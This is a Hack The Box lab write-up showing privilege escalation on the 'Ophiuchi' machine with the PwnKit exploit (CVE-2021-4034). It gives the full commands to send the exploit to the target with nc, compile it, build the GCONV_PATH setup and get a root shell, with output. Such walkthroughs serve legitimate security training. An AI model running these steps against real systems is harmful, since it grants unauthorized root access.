CVE-2021-4034
peas discovered that the target system is vulnerable to cve-2021-4034
The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.
A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.
exploit (pwnkit)
I found an exploit online
Exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/ophiuchi]
└─$ nc $IP 2222 < CVE-2021-4034.tar.gz
tomcat@ophiuchi:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.14.10 44088
tomcat@ophiuchi:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034Delivery complete
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ make
command 'make' not found, but can be installed with:
apt install make # version 4.2.1-1.2, or
apt install make-guile # version 4.2.1-1.2
Ask your administrator to install one of them.make is not available in the target system
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ gcc
gcc: fatal error: no input files
compilation terminated.
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ cc
cc: fatal error: no input files
compilation terminated.However, gcc and cc are installed and available.
I can compile the exploit manually
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ cc -Wall cve-2021-4034.c -o cve-2021-4034
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ mkdir -p GCONV_PATH=.
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ ll
total 68K
0 drwxr-x--- 2 tomcat tomcat 60 mar 29 17:45 'GCONV_PATH=.'
0 drwxr-x--- 5 tomcat tomcat 300 mar 29 17:45 .
4.0k -rw-r----- 1 tomcat tomcat 33 mar 29 17:45 gconv-modules
20k -rwxr-x--- 1 tomcat tomcat 17k mar 29 17:45 cve-2021-4034
16k -rwxr-x--- 1 tomcat tomcat 16k mar 29 17:45 pwnkit.so
0 drwxrwxrwt 3 root root 80 mar 29 17:45 ..
4.0k -rw-r----- 1 tomcat tomcat 292 mar 29 17:40 cve-2021-4034.c
4.0k -rwxr-x--- 1 tomcat tomcat 305 mar 29 17:40 cve-2021-4034.sh
0 drwxr-x--- 2 tomcat tomcat 100 mar 29 17:40 dry-run
0 drwxr-x--- 8 tomcat tomcat 260 mar 29 17:40 .git
4.0k -rw-r----- 1 tomcat tomcat 114 mar 29 17:40 .gitignore
4.0k -rw-r----- 1 tomcat tomcat 1.1k mar 29 17:40 LICENSE
4.0k -rw-r----- 1 tomcat tomcat 469 mar 29 17:40 Makefile
4.0k -rw-r----- 1 tomcat tomcat 339 mar 29 17:40 pwnkit.c
4.0k -rw-r----- 1 tomcat tomcat 3.4k mar 29 17:40 README.mdLooks all good.
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
ophiuchi
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.227 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:3d0d prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:3d0d prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:3d:0d txqueuelen 1000 (Ethernet)
RX packets 25214 bytes 5938624 (5.9 MB)
RX errors 0 dropped 150 overruns 0 frame 0
TX packets 7805 bytes 12728202 (12.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 62802 bytes 4471178 (4.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 62802 bytes 4471178 (4.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise